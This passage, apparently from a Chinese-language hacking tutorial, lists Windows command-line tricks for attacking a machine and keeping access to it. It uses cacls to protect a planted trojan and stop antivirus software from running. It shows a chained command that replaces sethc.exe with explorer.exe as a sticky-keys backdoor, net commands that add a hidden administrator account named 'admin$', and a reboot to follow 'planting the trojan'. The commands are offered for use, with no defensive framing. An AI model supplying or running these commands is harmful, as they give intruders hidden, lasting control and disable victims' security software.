6.cacls 作用:设置文件权限 实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone 说明:可以用它来保护木马文件或者禁止某个程序(如杀毒软件)运行。这个在有时候,我们taskkill某个进程,发现马上又起来了比较有用。 设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html) 7.& 作用:连续执行多个命令 实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe 说明:上面是最简单的shift按多次后跳出资源管理器下后门。直接拷贝一次执行即可,不用批处理拉。 注:上面操作,你如果一步一步操作,早就被系统还原了,没法实现文件替换、设置后门。 8.echo y| 作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n) 实例:echo y>echo y>cacls c:\windows\mm.exe /P everyone:R; 说明:将上面shift按多次后门简化:echo y | copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y | copy c:\windows\explorer.exe c:\windows\system32\sethc.exe (直接拷贝的时候会提示是否覆盖,这儿通过echo y解决) 9.net us_er/group(_去掉,因为华夏屏蔽) 作用:开账号,并加入到组(一般是administrators组) 实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add 说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的账号,仅一次隐藏。如长期隐藏,可参考:http://hi.baidu.com/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html 10.shutdown 作用:重启或者关闭机器,或者取消关机 实例:shutdown -r -t 0(立即重启) 说明:该重启的时候重启吧,一般开服务或者中马之后。 以上命令有些2000下可能无法运行,xp,2003下肯定ok。 后续,我再总结一下如何通过命令行来中马。 主要是通过ftp或者http下载或传输文件(完全命令行方式),同时也呼吁大家多共享自己得经验,共同提高。 |
|